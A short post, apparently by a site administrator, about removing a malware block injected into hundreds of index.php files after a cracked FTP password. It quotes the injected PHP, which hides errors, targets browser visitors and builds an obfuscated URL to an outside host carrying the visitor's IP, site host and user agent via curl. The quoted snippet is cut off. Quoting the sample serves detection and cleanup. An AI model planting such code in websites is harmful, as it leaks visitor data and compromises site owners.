Find and replace malware code blocks in php files via shell
Today I was attacked by an unknown bot or something like that. It placed the following code in many hundred index.php files on one of my servers, because the FTP-Password was cracked. <?php #19f955# error_reporting(0); ini_set(‘display_errors’,0); $wp_sjqe08340 = @$_SERVER[‘HTTP_USER_AGENT’]; if (( preg_match (‘/Gecko|MSIE/i’, $wp_sjqe08340) && !preg_match (‘/bot/i’, $wp_sjqe08340))){ $wp_sjqe0908340=”http://”.”http”.”href”.”.com/href”.”/?ip=”.$_SERVER[‘REMOTE_ADDR’].”&referer=”.urlencode($_SERVER[‘HTTP_HOST’]).”&ua=”.urlencode($wp_sjqe08340); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_sjqe0908340); […]